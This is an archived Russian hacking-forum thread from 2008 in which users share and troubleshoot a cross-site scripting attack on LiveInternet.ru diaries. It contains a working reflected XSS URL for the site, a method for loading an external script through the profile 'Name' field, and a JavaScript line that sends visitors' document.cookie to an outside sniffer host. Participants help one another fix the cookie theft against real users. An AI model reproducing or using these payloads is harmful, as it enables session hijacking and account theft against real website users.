Просмотр полной версии : Активная XSS в дневнике LiveInternet.ru
Объяснил для тех кто не соображает.
Ога,пантанулся,надо было у себя держать,щас ее быстро прикроют.
[:|||||:]
12.11.2008, 19:23
http://forum.antichat.ru/showpost.php?p=883295&postcount=269
E1ephant
18.11.2008, 21:16
сорри,Не знал, удаляйте значит топик
+1
http://www.liveinternet.ru/tests.php?cmd=show&session_id=a2377cc8c3a9eec8d990121c03cbf124&order=%22%3E%3Cscript%3Ealert('%EF%E0%F1%F1%E8%E2% EA%E0')%3C/script%3E
Чтобы обойти ограничение на кол-во символов нужно залить js файл к себе на хост, а в поле "Имя" вставить <script src="http://site/file.js"></script>.
Создаю аккаунт на бесплатном хостинге holm.ru , заливаю туда следующий скрипт, который должен отправлять куки зашедшего на сниффер:
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
в файле 1.js, итак пишу ссылку <script>http://hzz.h18.ru/1.js</script> в "Имя".
Захожу в профиль, после этого сразу открываю http://old.antichat.ru/sniff/log.php . И ничего нового на сниффер не ушло.
Я не очень хорошо разбираюсь в javascript, но вроде-бы это должно работать?? Подскажите, что здесь не так?
DimOnOID
01.12.2008, 18:11
Создаю аккаунт на бесплатном хостинге holm.ru , заливаю туда следующий скрипт, который должен отправлять куки зашедшего на сниффер:
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
в файле 1.js, итак пишу ссылку <script>http://hzz.h18.ru/1.js</script> в "Имя".
Захожу в профиль, после этого сразу открываю http://old.antichat.ru/sniff/log.php . И ничего нового на сниффер не ушло.
Я не очень хорошо разбираюсь в javascript, но вроде-бы это должно работать?? Подскажите, что здесь не так?
указывай
http://old.antichat.ru/cgi-bin/s.jpg
а не
http://antichat.ru/cgi-bin/s.jpg
Antiakvt
01.12.2008, 18:12
<script src="http://hzz.h18.ru/1.js">
</script>
а от чего топ еще жив, да и еще офтоп пошел?
не работает.... походу баг закрыли ;(
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot